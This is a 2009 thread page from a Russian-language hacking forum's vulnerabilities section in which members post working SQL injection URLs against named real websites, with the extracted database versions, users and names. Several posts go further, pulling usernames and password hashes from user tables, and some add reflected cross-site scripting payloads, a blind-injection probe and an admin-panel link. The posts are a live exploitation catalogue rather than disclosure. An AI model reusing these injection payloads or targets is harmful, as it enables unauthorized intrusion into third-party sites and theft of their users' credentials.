HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10131  
Старый 10.07.2009, 17:54
beerhack
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
С нами: 9576027

Репутация: 173
По умолчанию

PR 5
Код:
http://www.irs-net.de/kontakt/mitarbeiter.php?id=1+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,unhex(hex(concat_ws(0x3a,user,password))),17,18,19,20,21+from+mysql.user+limit+0,1/*
Database Version: 4.1.11-log
Database name: web
User name: root@www5.shuttle.de
 
Ответить с цитированием

  #10132  
Старый 10.07.2009, 21:03
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
С нами: 9318329

Репутация: 394
По умолчанию

PR 5
Код:
http://www.digitallyobsessed.com/displaypr.php?ID=-608+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,version(),27,28,29,30,31,32,33,34,35,36+from+users--
Database Version: 5.0.81-community
Database name: bobftp_obsessed
User name: bobftp_king@localhost
 
Ответить с цитированием

  #10133  
Старый 10.07.2009, 22:54
RazyKK
Познающий
Регистрация: 09.02.2009
Сообщений: 70
С нами: 9078977

Репутация: 34
По умолчанию

http://www.belsoft.ru/index.php?cont=prices&page=a&dob=2&id=21085+limit+ 0+UNION+SELECT+1,2,3,4,5,6,7,CONCAT(Version(),Data base(),User()),9,10,11--

Database Version: 5.0.67-log
Database name: u158438
User name: u158438@10.10.10.212

http://www.belsoft.ru/index.php?cont=prices&page=a&dob=2&id=21085+limit+ 0+UNION+SELECT+CONCAT((SELECT+CONCAT(converge_id,c onverge_pass_hash,converge_pass_salt)+FROM+u158438 .ibf_members_converge+LIMIT+2,1)),2,3,4,5,6,7,8,9, 10,11--

админка
http://www.belsoft.ru/forum/admin.php
 
Ответить с цитированием

  #10134  
Старый 11.07.2009, 08:36
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию

http://ru.tv-mis.com/titul.php?id=1+and+substring(version(),1,1)=5

ЗЫ еще xss Напишу

http://ru.tv-mis.com./titul.php?id=%20%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E =)

####################################

http://www.kokomansion.tv/showvideos.php?id=-1+union+select+1,concat(0x3a,user(),version(),data base()),3,4,5,6,7,8,9--

kokouser@localhost5.0.45kokomansiondb

ЗЫ еще xss Напишу

http://www.kokomansion.tv/showvideos.php?id=%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E

####################################
http://www.oreol.tv/services/channel.php?id=1+and+substring(version(),1,1)=5--

Последний раз редактировалось HAXTA4OK; 11.07.2009 в 09:04..
 
Ответить с цитированием

  #10135  
Старый 11.07.2009, 13:53
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами: 9116877

Репутация: 468


По умолчанию

http://www.gtbike.ru/articles.php?menu_id=38&razd_id=0&pg=1&id=-60+union+select+1,2,3,version(),5,6,7,8,9 PR 4

Последний раз редактировалось jokester; 11.07.2009 в 16:06.. Причина: tetis-pro.ru БОЯН
 
Ответить с цитированием

  #10136  
Старый 11.07.2009, 15:39
RazyKK
Познающий
Регистрация: 09.02.2009
Сообщений: 70
С нами: 9078977

Репутация: 34
По умолчанию

http://www.wavplanet.com/wavs.php?cat=5+union+select+1,concat(version(),dat abase(),user()),3,4,5,6,7--


4.0.17-standard-log wavplanet root@192.168.2.11
 
Ответить с цитированием

  #10137  
Старый 11.07.2009, 17:08
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами: 9428066

Репутация: 1668
По умолчанию

[PR 6]
Код:
http://www.dacc.edu/news/index.php?id=-503+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9
4.1.21-standard:news:public@localhost
==============================
[PR 4]
Код:
http://www.laererportalen.dk/kalender.php?id=-547+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10
5.1.35:laererportal:laererportal_u@localhost
==============================
[PR 4]
Код:
http://www.szgl.at/kalender.php?id=-28+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6
4.0.23-Max-log:d00942bb:d00942bb@localhost
==============================
[PR 3]
Код:
http://www.futter-fuers-volk.de/kalender.php?id=-3+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
5.0.51a-3ubuntu5.1:usr_web68_2:web68@localhost
==============================
[PR 3]
Код:
http://www.b-b-z.nl/jubileum/kalender.php?id=-7+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7
5.0.51a-3ubuntu5.4:b_b_z:b-b-z@localhost
==============================
[PR 2]
Код:
http://www.alexandra-ihrig.de/kalender.php?id=-12+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4
4.0.27-max-log:db196773590:dbo196773590@212.227.127.40
==============================
[PR 0]
Код:
http://neo24.sin.khk.be/phoenix/kalender.php?id=-73+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user())
5.0.81-1-log:neo24:neo24@squid.srv.sin.khk.be
Код:
http://neo24.sin.khk.be/phoenix/kalender.php?id=-73+union+select+1,2,3,4,concat_ws(0x3a,username,user_password)+from+phoenix_phpbb_users
Код:
http://neo24.sin.khk.be/phoenix/kalender.php?id=-73+union+select+1,2,3,4,concat_ws(0x3a,username,password)+from+tbl_users
 
Ответить с цитированием

  #10138  
Старый 11.07.2009, 19:23
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами: 9116877

Репутация: 468


По умолчанию

http://www.radioworld.ca/information.php?info_id=-45+union+select+1,2,3+from+admin+--
4я версия
 
Ответить с цитированием

  #10139  
Старый 11.07.2009, 20:40
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
С нами: 9230381

Репутация: 90
По умолчанию

db_info:
http://snt-nmu.kiev.ua/?l=ukr&p=scientific_groups&group=-10'+union+select+1,2,3,4,concat_ws(0x0b,version(), user(),database()),6,7--+
Цитата:
5.0.32-Debian_7etch8
snt-nmu@localhost
snt-nmu
tables:
http://snt-nmu.kiev.ua/?l=ukr&p=scientific_groups&group=-10'+union+select+1,2,3,4,group_concat(0x0b,column_ name),6,7+from+information_schema.columns+where+ta ble_name=0x7373735f70616e656c--+
Цитата:
id,
u_f_ukr,
u_i_ukr,
u_o_ukr,
u_f_rus,
u_i_rus,
u_o_rus,
u_f_en,
u_i_en,
u_login,
u_password,
u_session,
u_putdate,
u_number,
u_foto,
u_post_ukr,
u_post_rus,
u_post_en,
u_faculty,
u_entered_year,
u_group,
u_hobby_group,
u_about_sw,
u_home_address,
u_home_phone,
u_mobile_phone,
u_email,
u_icq,
u_url,
u_birthday,
u_sex,
u_date,
u_last_update,
u_ip,
u_graduated,
u_council,
u_order
ЗЫ: сайт на одном сервере с "инъектором" (inj3ct0r.com)
 
Ответить с цитированием

  #10140  
Старый 12.07.2009, 01:34
RazyKK
Познающий
Регистрация: 09.02.2009
Сообщений: 70
С нами: 9078977

Репутация: 34
По умолчанию

blind

http://www.hopewell-precision.com/product.php?prod_id=5+AND+ascii(lower(substring(da tabase(),1,1)))>1

stan12187@localhost
stan121871
5.1.22-log
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.